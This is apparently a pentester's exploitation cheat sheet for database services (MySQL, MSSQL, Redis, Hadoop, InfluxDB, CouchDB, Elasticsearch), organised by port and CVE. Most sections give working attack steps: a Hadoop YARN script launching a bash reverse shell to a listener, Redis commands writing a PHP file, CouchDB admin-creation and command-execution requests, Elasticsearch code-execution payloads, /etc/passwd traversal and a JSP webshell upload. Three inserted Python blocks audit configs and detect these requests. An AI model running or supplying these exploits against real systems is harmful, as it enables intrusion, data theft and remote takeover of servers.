MySQL
Port: 3306
MySQL authentication bypass vulnerability
CVE-2012-2122
Affected products: all MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not vulnerable.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not vulnerable.
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
Dumps the password hashes directly; decode the hashes to recover the passwords.
MSSQL
Port: 1433
MSSQL remote code execution
CVE-2020-0618
SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE)
SQL Server 2012 for x64-based Systems Service Pack 4 (QFE)
SQL Server 2014 Service Pack 3 for 32-bit Systems (CU)
SQL Server 2014 Service Pack 3 for 32-bit Systems (GDR)
SQL Server 2014 Service Pack 3 for x64-based Systems (CU)
SQL Server 2014 Service Pack 3 for x64-based Systems (GDR)
SQL Server 2016 for x64-based Systems Service Pack 1
SQL Server 2016 for x64-based Systems Service Pack 2 (CU)
SQL Server 2016 for x64-based Systems Service Pack 2 (GDR)
SQL Server remote code execution reproduction (CVE-2020-0618), Microsoft SQL Server 2016 SP2 (CSDN blog)
Build the payload, craft the request in Postman, start a listener, and send the request to get a command shell back.
PostgreSQL
Port: 5432
Oracle
Port: 1521
Redis:
Port: 6379
Redis unauthorized access
No password by default; can be abused to write a webshell, a cron job, or SSH public/private keys.
config set dir /tmp #set the web directory to write into
config set dbfilename 1.php #set the file name to write
set test "<?php phpinfo();?>" #set the file content to write
bgsave #save (in the background) to perform the write
save #save to perform the write
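The write-to-disk path above only works because CONFIG is reachable by an unauthenticated client. The following audit script is an added example (not from the original page) that reads a redis.conf text and reports the settings that leave that path open; both config fragments are constructed for the demonstration.

```python
import re

# Constructed sample redis.conf fragments (not from the original page):
# the first mirrors a default-style install, the second a hardened one.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
"""

HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass Use-A-Long-Random-Secret
rename-command CONFIG ""
"""

def parse_conf(text):
    """Return the active (non-comment) directives as {name: [values...]}."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        name, _, rest = line.partition(' ')
        conf.setdefault(name.lower(), []).append(rest.strip())
    return conf

def audit_redis_conf(text):
    """Return findings explaining why the unauthenticated write path
    (CONFIG SET dir / dbfilename followed by SAVE) is reachable."""
    conf = parse_conf(text)
    findings = []
    if 'requirepass' not in conf:
        findings.append('no requirepass: unauthenticated clients can run any command')
    if conf.get('protected-mode', ['yes'])[0].lower() == 'no':
        findings.append('protected-mode no: remote clients are accepted without a password')
    # A missing bind directive means Redis listens on every interface.
    for bind in conf.get('bind', ['0.0.0.0']):
        if '0.0.0.0' in bind or '::' in bind.split():
            findings.append('bind %s: listening on all interfaces' % bind)
    renamed = {v.split()[0].upper() for v in conf.get('rename-command', []) if v.split()}
    if 'CONFIG' not in renamed:
        findings.append('CONFIG not renamed/disabled: dir and dbfilename can be changed to drop files')
    return findings
```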
MongoDB:
Port: 27017
Hadoop
Port: 8020, 9000, 9820, 9870, 9864, 8088, 19888, 50070, 50075
Hadoop unauthorized access vulnerability
Version: all versions; there is no patch, but enabling security authentication defends against it
Command execution to get a shell
import requests

target = 'http://192.168.122.131:8088/'
lhost = '192.168.122.131'  # listener address: put your local host IP here and listen on port 9999

# Step 1: ask the unauthenticated YARN REST API for a new application id
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']

# Step 2: submit an application whose container command is the payload
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,  # listener port
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)
Start the listener, run the script, and catch the reverse shell.
H2 Database
Port: 20051
Vulnerable configuration: a misconfigured console
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
InfluxDB
Port: 8086, 8088
InfluxDB unauthorized access
CVE-2019-20933
Affected versions: InfluxDB < 1.7.6
http://xxx:8086/debug/vars exposes system and service information
Generate a JWT for an existing user with an unexpired timestamp to bypass authentication
JSON Web Tokens - jwt.io
Unix timestamp conversion tool (tool.lu)
Add the JWT and the query to the request
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzEyMjgxNzk3fQ.WAEt51lQ-mqTH5IcCQb1S7NcZQWKV5GbW9mB3rAlBjM
db=sample&q=show users
CouchDB
Port: 5984
CouchDB vertical privilege escalation
CVE-2017-12635
Affected versions: before 1.7.0 and before 2.1.1
Visit the login page at http://192.168.122.131:5984/_utils
Craft a request to create a new user with admin privileges
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.122.131:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 96

{"type": "user","name": "vulhub","roles": ["_admin"],"password": "vulhub"}
The server replies that only an administrator may set roles, but a crafted request bypasses that check
PUT /_users/org.couchdb.user:vulhub1 HTTP/1.1
Host: 192.168.122.131:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 113

{"type": "user","name": "vulhub1","roles": ["_admin"],"roles": [],"password": "vulhub"}
Log in successfully with the new account and password
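The second request above carries the "roles" key twice; the bypass depends on CouchDB's two JSON parsers (the Erlang side and the JavaScript validation function) reading different copies. The following is an added example (not CouchDB's code) showing how a first-wins and a last-wins parser disagree on such a body, and a strict loader that rejects duplicate keys outright; the request bodies are constructed from the ones above.

```python
import json

# Constructed request bodies modelled on the two PUT /_users requests above.
NORMAL_BODY = '{"type": "user","name": "vulhub","roles": ["_admin"],"password": "vulhub"}'
DUPLICATE_BODY = ('{"type": "user","name": "vulhub1","roles": ["_admin"],'
                  '"roles": [],"password": "vulhub"}')

class DuplicateKeyError(ValueError):
    pass

def _reject_duplicates(pairs):
    """object_pairs_hook: fail on any repeated key instead of silently keeping one copy."""
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise DuplicateKeyError('duplicate key %r in JSON object' % key)
        obj[key] = value
    return obj

def load_strict(body):
    """Parse JSON, refusing objects with duplicate keys."""
    return json.loads(body, object_pairs_hook=_reject_duplicates)

def roles_seen_by_each_parser(body):
    """Return (first-wins view, last-wins view) of the 'roles' field."""
    pairs = json.loads(body, object_pairs_hook=lambda p: p)
    first_wins = {}
    for key, value in pairs:
        first_wins.setdefault(key, value)   # keeps the first occurrence
    last_wins = dict(pairs)                  # dict() keeps the last occurrence
    return first_wins.get('roles'), last_wins.get('roles')

def is_acceptable_self_signup(body):
    """A non-admin signup is acceptable only if it parses strictly and assigns no roles."""
    try:
        doc = load_strict(body)
    except DuplicateKeyError:
        return False
    return doc.get('roles', []) == []
```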
CouchDB command execution vulnerability
CVE-2017-12636
Affected versions: before 1.7.0 and before 2.1.1
The 1.x and 2.x APIs differ, so the exploitation steps differ slightly
CVE-2017-12636 (CouchDB arbitrary command execution vulnerability) - toby123 - cnblogs.com
curl -X PUT 'http://vulhub:vulhub@192.168.122.131:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://vulhub:vulhub@192.168.122.131:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@192.168.122.131:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:vulhub@192.168.122.131:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'
Executed successfully
CouchDB code execution vulnerability
CVE-2022-24706
Affected versions: before 3.2.2
Use the PoC directly
vulhub/couchdb/CVE-2022-24706/poc.py at master · vulhub/vulhub · GitHub
Elasticsearch
Port: 9200, 9300
Elasticsearch command execution
CVE-2014-3120
Elasticsearch version: v1.1.1
First, this vulnerability requires at least one document to exist in ES, so create one first:
Capture and send the request; the command executes
POST /_search?pretty HTTP/1.1
Host:192.168.122.131:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 356

{"size": 1,"query": {"filtered": {"query": {"match_all": {}}}},"script_fields": {"command": {"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"}}}
Elasticsearch code execution
CVE-2015-1427
Version: v1.4.2
First, this vulnerability requires at least one document to exist in ES, so create one first (omitted here)
Send the request containing the payload
POST /_search?pretty HTTP/1.1
Host:192.168.122.131:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
Elasticsearch directory traversal
CVE-2015-3337
Affected versions: below 1.4.5 / below 1.5.2
Browser access does not work; send the request with Burp to http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd
Elasticsearch directory traversal
CVE-2015-5531
Affected versions: below 1.6.1
Create a repository
Create a snapshot
Read arbitrary files through directory traversal
http://192.168.122.131:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
The response returns the file content as ASCII codes
Decode script
p='114, 111, 111, 116, 58, 120, 58, 48, 58, 48, 58, 114, 111, 111, 116, 58, 47, 114, 111, 111, 116, 58, 47, 98, 105, 110, 47, 98, 97, 115, 104, 10, 100, 97, 101, 109, 111, 110, 58, 120, 58, 49, 58, 49, 58, 100, 97, 101, 109, 111, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 105, 110, 58, 120, 58, 50, 58, 50, 58, 98, 105, 110, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 115, 58, 120, 58, 51, 58, 51, 58, 115, 121, 115, 58, 47, 100, 101, 118, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 110, 99, 58, 120, 58, 52, 58, 54, 53, 53, 51, 52, 58, 115, 121, 110, 99, 58, 47, 98, 105, 110, 58, 47, 98, 105, 110, 47, 115, 121, 110, 99, 10, 103, 97, 109, 101, 115, 58, 120, 58, 53, 58, 54, 48, 58, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 110, 58, 120, 58, 54, 58, 49, 50, 58, 109, 97, 110, 58, 47, 118, 97, 114, 47, 99, 97, 99, 104, 101, 47, 109, 97, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 112, 58, 120, 58, 55, 58, 55, 58, 108, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 108, 112, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 105, 108, 58, 120, 58, 56, 58, 56, 58, 109, 97, 105, 108, 58, 47, 118, 97, 114, 47, 109, 97, 105, 108, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 101, 119, 115, 58, 120, 58, 57, 58, 57, 58, 110, 101, 119, 115, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 110, 101, 119, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 117, 117, 99, 112, 58, 120, 58, 49, 48, 58, 49, 48, 58, 
117, 117, 99, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 117, 117, 99, 112, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 112, 114, 111, 120, 121, 58, 120, 58, 49, 51, 58, 49, 51, 58, 112, 114, 111, 120, 121, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 119, 119, 119, 45, 100, 97, 116, 97, 58, 120, 58, 51, 51, 58, 51, 51, 58, 119, 119, 119, 45, 100, 97, 116, 97, 58, 47, 118, 97, 114, 47, 119, 119, 119, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 97, 99, 107, 117, 112, 58, 120, 58, 51, 52, 58, 51, 52, 58, 98, 97, 99, 107, 117, 112, 58, 47, 118, 97, 114, 47, 98, 97, 99, 107, 117, 112, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 105, 115, 116, 58, 120, 58, 51, 56, 58, 51, 56, 58, 77, 97, 105, 108, 105, 110, 103, 32, 76, 105, 115, 116, 32, 77, 97, 110, 97, 103, 101, 114, 58, 47, 118, 97, 114, 47, 108, 105, 115, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 105, 114, 99, 58, 120, 58, 51, 57, 58, 51, 57, 58, 105, 114, 99, 100, 58, 47, 118, 97, 114, 47, 114, 117, 110, 47, 105, 114, 99, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 103, 110, 97, 116, 115, 58, 120, 58, 52, 49, 58, 52, 49, 58, 71, 110, 97, 116, 115, 32, 66, 117, 103, 45, 82, 101, 112, 111, 114, 116, 105, 110, 103, 32, 83, 121, 115, 116, 101, 109, 32, 40, 97, 100, 109, 105, 110, 41, 58, 47, 118, 97, 114, 47, 108, 105, 98, 47, 103, 110, 97, 116, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 111, 98, 111, 100, 121, 58, 120, 58, 54, 53, 53, 51, 52, 58, 54, 53, 53, 51, 52, 58, 110, 111, 98, 111, 100, 121, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 
105, 110, 10, 95, 97, 112, 116, 58, 120, 58, 49, 48, 48, 58, 54, 53, 53, 51, 52, 58, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 98, 105, 110, 47, 102, 97, 108, 115, 101, 10'
q = p.replace(',', '')  # strip the commas between the values
values = q.split()  # split the string into a list of numbers
chars = []
for i in values:
    x = int(i)
    chars.append(chr(x))  # convert each integer ASCII value to its character
ss = ''.join(chars)  # join the list back into a string
print(ss)
Elasticsearch webshell write
WooYun-2015-110216
Affected versions: before 1.5.x
First create a malicious index document (the shell file is specified here as test.jsp; the ASCII byte values decode to /test.jsp):
curl -XPOST http://192.168.122.131:9200/yz.jsp/yz.jsp/1 -d '{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}'
Then create a malicious repository, where the value of location is the path to write to.
curl -XPUT 'http://192.168.122.131:9200/_snapshot/yz.jsp' -d '{"type": "fs","settings": {"location": "/usr/local/tomcat/webapps/wwwroot/","compress": false}
}'
Verify and create the repository:
curl -XPUT "http://192.168.122.131:9200/_snapshot/yz.jsp/yz.jsp" -d '{"indices": "yz.jsp","ignore_unavailable": "true","include_global_state": false
}'
#Visit the following URL to write the shell code
http://192.168.122.131:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success
#Visit the following URL; test.jsp is the webshell we wrote
http://192.168.122.131:8080/wwwroot/test.jsp
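The Elasticsearch requests in this section share a few detectable traits: script_fields that reach into java.lang.Runtime, `../` (or `%2f..`) in `_plugin` and `_snapshot` paths, and fs repositories whose location points outside the data directory. The following detector is an added example (not part of the original page) that runs those checks over constructed sample requests modelled on the ones above; treating /var/lib/elasticsearch/ as the only allowed repository root is an assumption made for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (method, path, body); not real captured logs.
SAMPLE_REQUESTS = [
    ('GET', '/_search?q=user:alice', ''),
    ('POST', '/_search?pretty', '{"size":1,"script_fields":{"cmd":{"script":"Runtime.getRuntime().exec(\\"id\\")"}}}'),
    ('POST', '/_search?pretty', '{"size":1,"script_fields":{"l":{"lang":"groovy","script":"java.lang.Math.class.forName(\\"java.lang.Runtime\\")"}}}'),
    ('GET', '/_plugin/head/../../../../../../../../../etc/passwd', ''),
    ('GET', '/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2fetc%2fpasswd', ''),
    ('PUT', '/_snapshot/yz.jsp', '{"type":"fs","settings":{"location":"/usr/local/tomcat/webapps/wwwroot/"}}'),
    ('PUT', '/_snapshot/backups', '{"type":"fs","settings":{"location":"/var/lib/elasticsearch/backups/"}}'),
]

# Assumed allowed root for fs repositories (the role path.repo plays in later releases).
ALLOWED_REPO_ROOT = '/var/lib/elasticsearch/'
SCRIPT_MARKERS = ('Runtime', 'forName(', 'ProcessBuilder', 'java.io.')

def classify(method, path, body):
    """Return the list of rule names a request trips (empty if nothing matched)."""
    hits = []
    decoded = unquote(path)  # %2f.. becomes /.. before matching
    if '../' in decoded or '/..' in decoded:
        hits.append('path-traversal')
    if '"script_fields"' in body and any(m in body for m in SCRIPT_MARKERS):
        hits.append('dynamic-script-exec')
    if method == 'PUT' and decoded.startswith('/_snapshot/'):
        m = re.search(r'"location"\s*:\s*"([^"]*)"', body)
        if m and not m.group(1).startswith(ALLOWED_REPO_ROOT):
            hits.append('snapshot-repo-outside-data-dir')
    return hits

def scan(requests):
    """Return (path, hits) for every request that tripped at least one rule."""
    flagged = []
    for method, path, body in requests:
        hits = classify(method, path, body)
        if hits:
            flagged.append((path, hits))
    return flagged
```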